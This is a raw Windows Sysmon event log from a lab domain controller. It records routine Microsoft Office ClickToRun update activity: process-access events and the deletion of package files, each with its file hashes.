10341000x800000000000000071689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.969{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.969{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50926564C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108859|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7330e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7319a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+714dc|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4744c7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+472b58|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000071687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\FileSystemMetadata.xmlMD5=CAA29C72715E470023C06C1A1787B0B9,SHA256=91B631F33C0BEC6CB3AACFC0BFE69ECB35B9A0FD20C2794A36A4401D32BDD111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\wordmui.msi.16.en-us.vreg.datMD5=18219395073D66C302423CF23D0527E8,SHA256=DE65329B817FF6435450231CC9A02E211DEE8A1842B06CA8526767BCBCCF5BF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\word.x-none.msi.16.x-none.vreg.datMD5=78BB3FFC7DE3DBC4D00E4AC419C30D6C,SHA256=E7B0D69C25F57789738B25C3EA0FC2214502885FF2516AE9A59779BE82D00911,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.891{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\publishermui.msi.16.en-us.vreg.datMD5=88974E061EC45FFDC8D7FE40615D2CD1,SHA256=38DD381AD41CDD4FC0DE0EB5755629A24378766C458C0A82E3531023E7281A3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.891{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\publisher.x-none.msi.16.x-none.vreg.datMD5=7B91A9055EA9B3B20150208669D62B78,SHA256=E242ECBDF6FA4FDD00D3BA99C71610D604777D42B5907872CC270BC7BE204456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.891{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\proofing.msi.16.en-us.vreg.datMD5=82D092947066239FB0493AF77C59CF45,SHA256=BCC2193DE45BE4B8F808E503A420F1E6366273B1D87B5998BB6AD498E52FBA3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.891{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\proof.fr-fr.msi.16.fr-fr.vreg.datMD5=4BF260882DA867FA3192C3471C15CC97,SHA256=EE3B6920A82A2798E684BC77F7A7504A796E69F398334C137F4E1D5008D1C3E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\proof.es-es.msi.16.es-es.vreg.datMD5=0732C03D2BDB0BCEB42F20B5C0A2F332,SHA256=FFBA3A1A4753CFFF5A5B996B33A42CC7AFB2F0158FBAD631EFFCCAF55186DBE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\proof.en-us.msi.16.en-us.vreg.datMD5=1C4887C0372D2BCFA2C96BE7344E4672,SHA256=457FF394CBF79F09BBBB3576A3D359F8B9EAA0E631CEED1557682E28C4161E44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\powerview.x-none.msi.16.x-none.vreg.datMD5=08EF6247868D40E178EDCC80364B43C1,SHA256=23945D78BF3CE7D44422867668F314F1F319A30095FF2393018354A54D42E9FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\powerpointmui.msi.16.en-us.vreg.datMD5=3CB000D3207E4A956F8625E67449F972,SHA256=0352A8D6A9C578E7B9EB2B928FA65A41A863E9F4594D467F7B0A38654717D254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\powerpoint.x-none.msi.16.x-none.vreg.datMD5=74ABB1DD37E6FF452AEEF34077DBCE1E,SHA256=683BE432247AA95AD49CBE563FEDB14F133E29A733A0E2A782B31E90585A9BBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\powerpivot.x-none.msi.16.x-none.vreg.datMD5=AA46C81D2106134287B3C44083948E66,SHA256=17197013E5567BA39EC6E48F7F39E062679796984BF00F94F3E88327BF022CD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\outlookmui.msi.16.en-us.vreg.datMD5=BDAC43EB4F48E748FD16429D3F0ECE2C,SHA256=9FB97E2C5FDBB6784135769F95DBBC3C58C5CA0E33C04898D6198B3D2650CD91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\outlook.x-none.msi.16.x-none.vreg.datMD5=F50667FF853A5C7564A29A7A8393B976,SHA256=5F99544A2592EB34C762F20A0A7D6474057827064876D1FD84BC24FB2D2A28BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.844{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\osmuxmui.msi.16.en-us.vreg.datMD5=9A819712B5AEE73326FFF8FE37CFBFBC,SHA256=7EECFD9F7B5A991980F1F2D4829AF91A8EEFD5F5DA21A56325E74948E6864155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.844{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\osmux.x-none.msi.16.x-none.vreg.datMD5=DDC29C310384F1FAEE9E84A1905D500F,SHA256=71D0595A1E411C976E64DD1558FE29C95479E2470CBC912002FED4BDF307D461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.844{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\osmmui.msi.16.en-us.vreg.datMD5=8DAFC8A9E5C2056EF39D21A245B2ACEC,SHA256=9ECC4D9A20B4E62617B3B0AC32D18F78A0A5366D35757BE56CB4F16BBAC557AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.844{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\osm.x-none.msi.16.x-none.vreg.datMD5=561D549D0918103EB917619B258EBE53,SHA256=709CDB663B43F7B564AFBF56A94C3DC35F1E388A42AD7709F327D9B613EFBC14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\onenotemui.msi.16.en-us.vreg.datMD5=51469196F89C2C0FA957D582676BAF90,SHA256=34C22F1ED35341A2990CAE88F8B4FFFD528BC1999D7D0A0BBD68F462C63EA419,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\onenote.x-none.msi.16.x-none.vreg.datMD5=B0DEC94F4C8C2D173575FDA63740A118,SHA256=2508F4574C7113F0D2BE73A2DCA15657CA688D36DC8E2199C4BB9DE08654302C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\officemuiset.msi.16.en-us.vreg.datMD5=DAE7D744EB4AB65CE6A465FF3A70175A,SHA256=964AB914C67A35F3AE2C6EB260958CE731D37D7317C104992F850D423581FCA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\officemui.msi.16.en-us.vreg.datMD5=66E7E29235E54DC9EFA58BC2345C0637,SHA256=3867917828C9041FF9362880E37E3145D7FC153B5C73AB84074C7AD538B2342C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\office32ww.msi.16.x-none.vreg.datMD5=DBAA0891D0CA3C65A2AEE4BD0D60EA83,SHA256=ED4F8F4E4796F3A46E6D60D44B0471A9FA4BED225F6D505D38F8F43136FEE8A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\office32mui.msi.16.en-us.vreg.datMD5=8AC7808F51BE6BCF9221580EB55007E3,SHA256=9BA0CB127215393A5CEE3456AC916CF344AAF295BFD35F13BD8F800BCB925597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\office.x-none.msi.16.x-none.vreg.datMD5=B148AD74C87EA5FBCDC502B28F63489E,SHA256=7185F41645BAE81C1BCB56A68CB78E859AF88400646D33D042E542098A4B3F8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.766{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\lyncmui.msi.16.en-us.vreg.datMD5=57C4485790A907272A5C6DDA25917578,SHA256=72D0CA03BAA4B7108D19813E969BA5096575F2E8CD461C6881716B1C834C7441,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.766{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\lync.x-none.msi.16.x-none.vreg.datMD5=7B64DC3733637965FED4ED4D7DE044F1,SHA256=A1AA2256145BDAEA7F5AA424133D98D06A268518749350831FC2B2703EB47E82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\excelmui.msi.16.en-us.vreg.datMD5=C098CC65C3264ACB4208B10BBF5C7D61,SHA256=B377102C782F9F83C115567A515FBB83D41CBA7E44BF687F298B0DAE22CE0872,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\excel.x-none.msi.16.x-none.vreg.datMD5=CDF919C15D1056E47CC388E13868EFC9,SHA256=84645F5723B80EEA305DBAA98D755BF4659F6DEC9EAAB1D6A487729FD90ED280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\dcfmui.msi.16.en-us.vreg.datMD5=51B281FA33BE27A292032F9EED2902B9,SHA256=AC8494A7B2E7472000B353EC1EF46B216B46FE95058253E1372F102D79E40A8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\dcf.x-none.msi.16.x-none.vreg.datMD5=9FF29EABF865BC2079FF57FD3903F849,SHA256=DA22B20A651F521E3C3E8C249217124D2395EB18E5AE42677BD09C97E0D7A664,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\accessmuiset.msi.16.en-us.vreg.datMD5=2732C404F8B7231904ECD2029A588E7F,SHA256=023659127D120E8A16AE556F564814ECC5503602FFBC7556A37EAB0B70EDAF38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.719{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\accessmui.msi.16.en-us.vreg.datMD5=95F0EA6B1BF3761EB6BFE21554E2A1C6,SHA256=97AB44852BAAE9CB054F7E6EE89C1924397D6890599D0A11F0C2B74EDEB69AF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.719{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vreg\access.x-none.msi.16.x-none.vreg.datMD5=A6F6C5275369E3D8F3DE7A6771F9121D,SHA256=D3FEEDF31998419A989A553D16BE23445C2B13A8ECB29AD3E00C0527C58FB909,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.719{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\SHELLNEW\MSPUB.PUBMD5=0627B4727E2BFE1D1CB7F06B82BFCC5C,SHA256=E050EA777D910137FFF7C160992EC026AB4F76832B6C96701B114E379ABF4CA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\SHELLNEW\EXCEL12.XLSXMD5=C0EDCC68BA60D6BCBF77BC5132BF2A5D,SHA256=4A51286A29368A60AB9B8C76DFC4F96903588C986CAEE9309E3FC1EB8E5FC5C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\misc.exeMD5=90CC680AC7E3F1AC2C024A757D1294DF,SHA256=08C998A50167B144386A2B6F1D76A7EDE8168CB8F0781AE75CE80759CD36027F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-001F-0C0A-1000-0000000FF1CE}\misc.exeMD5=90CC680AC7E3F1AC2C024A757D1294DF,SHA256=08C998A50167B144386A2B6F1D76A7EDE8168CB8F0781AE75CE80759CD36027F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exeMD5=90CC680AC7E3F1AC2C024A757D1294DF,SHA256=08C998A50167B144386A2B6F1D76A7EDE8168CB8F0781AE75CE80759CD36027F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-001F-0409-1000-0000000FF1CE}\misc.exeMD5=90CC680AC7E3F1AC2C024A757D1294DF,SHA256=08C998A50167B144386A2B6F1D76A7EDE8168CB8F0781AE75CE80759CD36027F,IMPHASH=00000000000000000000000000000000truetrue 